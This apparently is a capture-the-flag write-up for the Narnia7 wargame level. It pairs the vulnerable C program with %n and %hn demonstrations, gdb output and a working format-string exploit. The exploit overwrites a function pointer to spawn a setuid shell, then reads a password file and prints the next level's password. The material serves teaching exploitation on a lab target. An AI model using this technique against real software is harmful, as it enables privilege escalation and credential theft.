/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
	    fflush(stdout);
        setreuid(geteuid(),geteuid());
        system("/bin/sh");

        return 0;
}

int main(){
	int p = -1;
	printf("p = 0x%08x\n",p);
	printf("Hello%n World!\n", &p);
	printf("p = 0x%08x\n",p);
}

p = 0xffffffff
Hello World!
p = 0x00000005

int main(){
	int p = -1;
	printf("p = 0x%08x\n",p);
	printf("Hello%hn World!\n", &p);
	printf("p = 0x%08x\n",p);
}

p = 0xffffffff
Hello World!
p = 0xffff0005

narnia7@narnia:/narnia$ ./narnia7 aa bb
goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd668)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

(gdb) x/20x $esp
0xffffd61c:	0xffffd62c	0x00000080	0xffffd892	0x080486ff
0xffffd62c:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd63c:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd64c:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd65c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb)

narnia7@narnia:/narnia$ ./narnia7 $(python -c 'print "\x58\xd6\xff\xff%34592x%02hn"')
goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd658)
I guess you want to come to the hackedfunction...
Way to go!!!!$ whoami
narnia8
$ cat /etc/narnia_pass/narnia8
mohthuphog
$